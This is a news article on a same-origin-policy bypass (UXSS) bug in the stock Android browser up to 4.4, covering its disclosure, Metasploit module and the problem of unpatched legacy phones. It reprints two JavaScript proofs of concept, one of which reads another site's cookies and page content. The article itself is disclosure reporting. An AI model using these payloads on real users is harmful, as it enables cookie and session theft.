Legacy Android SOP bypass bug leaves billions of smart phone and tablets exposed

Legacy Android bug leaves billions of smart phone and tablets exposed

A Pakistani researcher Rafay Baloch has uncovered a SOP bypass bug present in the default browser of Android (stock browser), shipped in every version of the open source OS right upto 4.4 KitKat. The expert coordinated the disclosure of the bug with the security firm Rapid7, which released a Metasploit module for it. The default browser runs on the devices of roughly 70% smartphone users which uses older versions of android, making billions of users exposed to the flaw.

Universal Cross-scripting Vulnerability

The vulnerability, which affects the WebView component, occurs “when replacing the ‘data’ attribute of a given HTML object with a JavaScript URL scheme,” explained Tod Beardsley, technical lead for the Metasploit framework. An attacker can leverage the UXSS flaw to scrape cookie data and page contents from a vulnerable browser window, Rapid7 said. The company has noted that target URLs using X-Frame-Options are not affected. The security hole can be exploited on all versions of the Android Open Source Platform (AOSP) browser, including those using WebView.

Drawback of being Open Source

Google did release a patch for this flaw. However, a major drawback of the way the Android community works is that it is upto the manufactures to propagate updates to its users- which a majority of them do not bother to do. This is felt when Google releases new versions of Android and the pinch is also being felt now. Since most manufacturers may not bother with the update, millions who are using an older version of android are left stuck with this vulnerability for ever, unless they buy a new handset which comes with the latest version of Android 5.0 lollipop. But these users generally belong to the lower mid and mid range segment and cannot not afford the latest handset in the first place, so buying a new handset isn’t really an option for them.

“For many, many people, buying a new phone just isn’t practical; the people who are most likely affected by ‘legacy’ Android bugs are the same people who couldn’t afford a fancy ‘latest’ Android handset in the first place,” Beardsley said in a blog post. “In other words, it looks like a billion phones aren’t going to see this patch any time soon, if ever. It’s nice that the patch exists, but Google doesn’t seem to have any practical way of getting it out to the world.”

Proof of Concept

The following is the proof of concept:

<script>
window.onload = function()
{
object = document.createElement(“object”);
object.setAttribute(“data”, “https://www.bing.com”);
document.body.appendChild(object);
object.onload = function() {
object.setAttribute(“data”, “javascript:alert(document.domain)”);
object.innerHTML = “foobar”;
}
}
</script>

The POC is very easy to understand for individuals having some javaScript background. However, for the uninitiated, Rafay has given following breakup

The above code creates an object with data attribute, which loads up a URL from another origin in this case “https://www.bing.com”, however once it’s loaded, we replace bing.com with “javascript:alert(document.domain)”. The interesting thing here is that the last line is essential for the POC to work object.innerHTML = “foobar”; so that the navigation request is performed

Proof Of Concept Using Postmessage Call

The following POC uses postMessage call from HTML 5 world to send the document.cookie and innerHTML to the main window.

<script>
window.onload = function()
{
object = document.createElement(“object”);
object.setAttribute(“data”, “https://www.bing.com”);
document.body.appendChild(object);
object.onload = function() {
object.data = “javascript:var t=top;with(document)t.postMessage(‘HTML=’+body.innerHTML+’&COOKIE=’+cookie,’*’);”;
object.innerHTML = “foobar”;
}
}

window.onmessage = function(m){
alert(m.data);
}
</script> –

Vulnerable Code

Rafay has also given the vulnerable code which is reproduced below :

bool HTMLPlugInImageElement::allowedToLoadFrameURL(const String& url)
{
ASSERT(document());
ASSERT(document()->frame());
if (document()->frame()->page()->frameCount() >= Page::maxNumberOfFrames)
return false;
KURL completeURL = document()->completeURL(url);

IF you are a security researcher or a white hat hacker, you can download the Metasploit for UXSS of Android browsers from here. Do remember use the Metasploit only if you are familiar with it.

Other PoCs and the fix has been given by Rafay on his blog given below.

Resource : Rafay Hacking Articles

LEAVE A REPLY

Please enter your comment!
Please enter your name here